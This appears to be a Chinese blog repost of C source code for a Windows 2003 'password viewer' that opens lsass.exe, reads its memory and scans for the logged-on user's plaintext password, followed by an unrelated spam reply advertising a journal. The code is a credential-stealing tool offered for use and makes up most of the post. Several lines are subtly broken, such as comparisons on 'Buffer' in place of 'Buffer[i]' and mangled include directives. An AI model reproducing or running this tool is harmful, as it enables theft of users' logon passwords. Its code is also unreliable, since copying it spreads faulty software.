WINDOWS2003　查密码软件源程序--泡泡

回忆的相片苦涩的记忆

————————————

?▊|▍WINDOWS2003 查密码软件源程序 2006-8-13 3:39:00

//********************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method
// Used Is Pretty Unwise,But This May Be The Only Way To Review The
// Logon User's Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC++ 6.0
//********************************************************************************
＃i nclude <stdio.h>
＃i nclude <windows.h>
＃i nclude <tlhelp32.h>

#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable

char Password[MAX_PATH] = {0}; // Store The Found Password

// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID);
int Search(char *Buffer,const UINT nSize);
DWORD GetLsassPID();
BOOL Is2003();
//------------------------------------------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration

int main()
{
DWORD PID = 0;
printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

if (!Is2003()) // Check Out If The Box Is 2003
{
printf("The Program Can't Only Run On Windows 2003 Platform\n");
return -1;
}

PID = GetLsassPID(); // Get The Lsass.exe PID

if (PID == 0) // Fail To Get PID If Returning Zerom
{
return -1;
}

FindPassword(PID); // Find The Password From Lsass.exe Memory
return 0;
}
// End main()

//------------------------------------------------------------------------------------
// Purpose: Search The Memory & Try To Get The Password
// Return Type: int
// Parameters:
// In: char *Buffer --> The Memory Buffer To Search
// Out: const UINT nSize --> The Size Of The Memory Buffer
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
// Since The Password Is Near The Above Location,But It's Not Always True That
// We Will Find The Magic String,Or Even We Find It,The Password May Be Located
// At Some Other Place.We Only Look For Luck
//------------------------------------------------------------------------------------
int Search(char *Buffer,const UINT nSize)
{
UINT OffSet = 0;
UINT i = 0;
UINT j = 0 ;
UINT Count = 0;
if (Buffer == NULL)
{
return -1;
}
for (i = 0 ; i < nSize ; i++)
{
/* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word
Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
The Magic String,We Have To Do It Manually And Slowly
*/
if (Buffer == 'L')
{
OffSet = 0;
if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)
{
OffSet += strlen("LocalSystem") + 1;
if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)
{
OffSet += strlen("Remote") + 1;
if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)
{
OffSet += strlen("Procedure") + 1;
if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)
{
i += OffSet;
break;
}
}
}
}
}
}
if (i < nSize)
{
ZeroMemory(Password,sizeof(Password));
for (; i < nSize ; i++)
{
if (Buffer == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)
{
/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In
That Way
*/
j = i + 7;
for (; j < nSize; j += 2)
{
if (Buffer[j] > 0)
{
Password[Count++] = Buffer[j];
}
else
{
break;
}
}
return i + 7; // One Flag To Indicate We Find The Password
}
}
}
return -1; // Well,We Fail To Find The Password,And This Always Happens
}
// End Search

//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters: None

[广告]黄金帖间文字广告位招租中联系QQ：876520（请注明“贴吧广告”）

--------------------------------------------------------------------------------

第3楼作者： 61.154.221.*** 时间：5-4-26 10:25:00 回复此发言
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
HANDLE hProcessSnap;
HANDLE hProcess = NULL;
PROCESSENTRY32 pe32;
DWORD PID = 0;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
printf("Fail To Create Snap Shot\n");
return 0;
}

pe32.dwSize = sizeof(PROCESSENTRY32);

if( !Process32First(hProcessSnap, &pe32))
{
CloseHandle(hProcessSnap); // Must clean up the snapshot object!
return 0;
}

do
{
if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)
{
PID = pe32.th32ProcessID;
break;
}
}while(Process32Next( hProcessSnap, &pe32));

CloseHandle( hProcessSnap);
return PID;
}
// End GetLsassPID()

//------------------------------------------------------------------------------------
// Purpose: To Find The Password
// Return Type: BOOLEAN
// Parameters:
// In: DWORD PID -> The Lsass.exe's PID
//------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
HANDLE hProcess = NULL;
char Buffer[5 * 1024] = {0};
DWORD ByteGet = 0;
int Found = -1;

hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process
if (hProcess == NULL)
{
printf("Fail To Open Process\n");
return FALSE;
}

if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet))

// Read The Memory From Lsass.exe
{
printf("Fail To Read Memory\n");
CloseHandle(hProcess);
return FALSE;
}

CloseHandle(hProcess);

Found = Search(Buffer,ByteGet); // Search The Password
if (Found >= 0) // We May Find The Password
{
if (strlen(Password) > 0)

// Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not
{
printf("Found Password At #0x%x -> \"%s\"\n",Found + BaseAddress,Password);
}
}
else
{
printf("Fail To Find The Password\n");
}
return TRUE;
}
// End FindPassword

//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters: None
//------------------------------------------------------------------------------------
BOOL Is2003()
{
OSVERSIONINFOEX osvi;
BOOL b0sVersionInfoEx;
ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
{
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
}
return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
}
// End Is2003()
// End Of File

——————over

By:liucho0400 阅读全文 | 回复(2) | 引用通告 | 编辑

?▊|▍Re:WINDOWS2003 查密码软件源程序 2008-8-29 14:48:00

《经营管理者》杂志社
征稿启示
无论您是企业老板，还是企业职工，无论您是公务员、还是事业单位职工，只要您希望单位更辉煌，本人才华得到更充分的展示，职务晋升更胜人一筹，职称晋级更得先机，评优评先优人一级……选择国家正规刊物《经营管理者》发表您的佳作，推广您的成果，宣传您的企业，包您心想事成，一帆风顺。
主　　管：四川省经济委员会主　　办：四川省企业联合会
出　　版：经营管理者杂志社
邮发代号：62-46 国内统一刊号：cn51－1071/f
国际标准刊号：issn1003－6067 国外发行代号：c2587
《经营与管理》杂志，是面向全国各行各业的单位领导、职工对本行业的管理、研究、探索所总结出来的经典总结、报告、创新论文、经验交流等面向全国公开发行的一本综合性期刊。我们以崇尚务实，相约成功，以专业专心的精神，打造全新的《经营管理者》，奉献给每一位领导、公务员、科研工作者、教师、医生、企业员工、学生等研究、探索、交流、学习型杂志。自1986年创刊以来深受国家新闻出版总局、新闻工作者、各行各业的领导、职工的好评。可以全国范围内邮购和订阅。
主要栏目：
精英笔录专题策划特别报道名家对话高端实务资本市场经济观察区域聚集视角前沿赢在策略创业之道商战轶事谈经论道投资理财圆桌人生百家争鸣
文章要求：
1、文稿要求：内容新颖、论点明确、力求文字精炼、准确、通顺，文题简明扼要，文稿应资料可靠、数据准确、书写规范，文责自负。
2、文章结构：题目、作者、作者单位、摘要、关键词、文章正文、参考文献、作者简介、作者详细通讯地址、电话、邮箱。
3、论文涉及的课题如取得国家或部、省级以上专项基金或属攻关项目，应注于文章正文下方。
4、文章字数：所有文章不超过2500字，一律不用图表，用word文档编辑，用附件发送我们指定的电子邮箱。
我们对来稿的处理办法是：
1、经编委会审查合格后，用电子邮箱发给《用稿通知书》。
2、凡来稿必须同意我们刊登，并参加我们举行的“新时期新理念论文成果”评奖活动。
3、文章刊登后我们挂号寄给作者样刊一本。
为了增大《经营管理者》发行力度，我们面向各省市区县特约“经营管理者特约编辑”，请有意者将简历和联系方式发送到我社电子邮箱里，我们研究后即发给《特约编辑聘用证书》、《代为组稿委托书》和样刊，由其代理本杂志在当地的组稿、研究活动。
地址：成都市通锦桥路93号《经营管理者》编辑部603室
邮编：610031
投稿邮箱：jszy100@yeah.net
联系电话： 13458519606
工作q q：403484835

《经营管理者》杂志社

——————over

By:kjlxz100 个人主页 | 引用 | 返回 | 删除 | 回复

发表评论：

————————————